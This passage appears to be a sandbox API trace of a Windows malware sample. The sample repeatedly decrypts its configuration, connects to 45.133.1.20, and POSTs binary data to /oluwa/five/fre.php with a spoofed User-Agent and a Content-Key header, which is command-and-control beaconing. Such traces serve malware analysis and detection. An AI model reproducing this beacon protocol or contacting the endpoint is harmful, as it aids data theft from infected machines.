[0311.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0311.817] closesocket (s=0xbdc) returned 0 [0311.818] GetProcessHeap () returned 0x6a0000 [0311.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0311.818] GetProcessHeap () returned 0x6a0000 [0311.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0311.818] GetProcessHeap () returned 0x6a0000 [0311.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0311.819] GetProcessHeap () returned 0x6a0000 [0311.819] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0311.819] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x191c) returned 0xbdc [0311.821] Sleep (dwMilliseconds=0xea60) [0311.823] GetProcessHeap () returned 0x6a0000 [0311.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0311.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.824] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.831] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0311.840] GetProcessHeap () returned 0x6a0000 [0311.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6b48 [0311.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.843] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b6b48, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0311.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.844] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.846] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.846] GetProcessHeap () returned 0x6a0000 [0311.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6b48 | out: hHeap=0x6a0000) returned 1 [0311.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.848] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0311.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.849] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0311.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.855] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0311.855] GetProcessHeap () returned 0x6a0000 [0311.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0311.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.857] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.857] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.858] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.860] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.861] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.861] GetProcessHeap () returned 0x6a0000 [0311.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0311.861] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.862] GetProcessHeap () returned 0x6a0000 [0311.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0311.862] GetProcessHeap () returned 0x6a0000 [0311.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0311.863] GetProcessHeap () returned 0x6a0000 [0311.863] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0311.863] GetProcessHeap () returned 0x6a0000 [0311.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0311.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.876] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0311.886] GetProcessHeap () returned 0x6a0000 [0311.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0311.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.887] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0311.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.888] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.889] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.889] GetProcessHeap () returned 0x6a0000 [0311.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0311.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.891] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0311.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.892] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0311.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.893] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0311.893] GetProcessHeap () returned 0x6a0000 [0311.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0311.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.894] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0311.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.896] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0311.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.897] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0311.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.898] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0311.898] GetProcessHeap () returned 0x6a0000 [0311.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0311.898] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0311.898] GetProcessHeap () returned 0x6a0000 [0311.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0311.898] socket (af=2, type=1, protocol=6) returned 0xbe0 [0311.899] connect (s=0xbe0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0311.923] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0311.923] GetProcessHeap () returned 0x6a0000 [0311.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0311.923] GetProcessHeap () returned 0x6a0000 [0311.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0311.924] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0311.925] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0311.925] GetProcessHeap () returned 0x6a0000 [0311.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df9e8 [0311.925] GetProcessHeap () returned 0x6a0000 [0311.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0311.926] GetProcessHeap () returned 0x6a0000 [0311.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0311.926] GetProcessHeap () returned 0x6a0000 [0311.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0311.927] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0311.928] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0311.928] GetProcessHeap () returned 0x6a0000 [0311.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0311.928] GetProcessHeap () returned 0x6a0000 [0311.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0311.929] send (s=0xbe0, buf=0x6bd460*, len=242, flags=0) returned 242 [0311.929] send (s=0xbe0, buf=0x6bb998*, len=159, flags=0) returned 159 [0311.929] GetProcessHeap () returned 0x6a0000 [0311.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0311.930] recv (in: s=0xbe0, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0312.008] GetProcessHeap () returned 0x6a0000 [0312.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0312.009] GetProcessHeap () returned 0x6a0000 [0312.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0312.010] GetProcessHeap () returned 0x6a0000 [0312.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df9e8 | out: hHeap=0x6a0000) returned 1 [0312.010] GetProcessHeap () returned 0x6a0000 [0312.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0312.011] closesocket (s=0xbe0) returned 0 [0312.011] GetProcessHeap () returned 0x6a0000 [0312.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0312.011] GetProcessHeap () returned 0x6a0000 [0312.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.012] GetProcessHeap () returned 0x6a0000 [0312.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0312.012] GetProcessHeap () returned 0x6a0000 [0312.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0312.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1920) returned 0xbe0 [0312.015] Sleep (dwMilliseconds=0xea60) [0312.017] GetProcessHeap () returned 0x6a0000 [0312.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0312.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.018] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.025] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0312.032] GetProcessHeap () returned 0x6a0000 [0312.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0312.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.034] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0312.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.040] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.042] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.042] GetProcessHeap () returned 0x6a0000 [0312.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0312.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.043] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0312.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.044] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0312.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.047] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0312.047] GetProcessHeap () returned 0x6a0000 [0312.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.048] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.050] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.051] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.052] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.052] GetProcessHeap () returned 0x6a0000 [0312.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0312.052] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.052] GetProcessHeap () returned 0x6a0000 [0312.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0312.053] GetProcessHeap () returned 0x6a0000 [0312.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.053] GetProcessHeap () returned 0x6a0000 [0312.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0312.054] GetProcessHeap () returned 0x6a0000 [0312.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0312.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.055] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0312.069] GetProcessHeap () returned 0x6a0000 [0312.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0312.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.071] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0312.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.072] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.073] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.073] GetProcessHeap () returned 0x6a0000 [0312.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0312.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.075] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0312.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.076] CryptDestroyKey (hKey=0x6ad020) returned 1 [0312.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.078] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0312.078] GetProcessHeap () returned 0x6a0000 [0312.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0312.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.079] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0312.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.081] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0312.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.082] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0312.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.083] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0312.083] GetProcessHeap () returned 0x6a0000 [0312.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0312.083] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0312.083] GetProcessHeap () returned 0x6a0000 [0312.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0312.083] socket (af=2, type=1, protocol=6) returned 0xbe4 [0312.084] connect (s=0xbe4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0312.108] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0312.108] GetProcessHeap () returned 0x6a0000 [0312.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0312.108] GetProcessHeap () returned 0x6a0000 [0312.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0312.109] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.110] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0312.110] GetProcessHeap () returned 0x6a0000 [0312.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfce8 [0312.110] GetProcessHeap () returned 0x6a0000 [0312.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0312.111] GetProcessHeap () returned 0x6a0000 [0312.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0312.111] GetProcessHeap () returned 0x6a0000 [0312.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0312.112] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.113] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0312.113] GetProcessHeap () returned 0x6a0000 [0312.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0312.113] GetProcessHeap () returned 0x6a0000 [0312.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0312.114] send (s=0xbe4, buf=0x6bd460*, len=242, flags=0) returned 242 [0312.114] send (s=0xbe4, buf=0x6bb998*, len=159, flags=0) returned 159 [0312.114] GetProcessHeap () returned 0x6a0000 [0312.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0312.114] recv (in: s=0xbe4, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0312.186] GetProcessHeap () returned 0x6a0000 [0312.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0312.187] GetProcessHeap () returned 0x6a0000 [0312.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0312.188] GetProcessHeap () returned 0x6a0000 [0312.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfce8 | out: hHeap=0x6a0000) returned 1 [0312.188] GetProcessHeap () returned 0x6a0000 [0312.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0312.189] closesocket (s=0xbe4) returned 0 [0312.189] GetProcessHeap () returned 0x6a0000 [0312.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0312.189] GetProcessHeap () returned 0x6a0000 [0312.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0312.190] GetProcessHeap () returned 0x6a0000 [0312.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0312.190] GetProcessHeap () returned 0x6a0000 [0312.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0312.191] CreateThread (in: lpThreadAttributes=0x0, 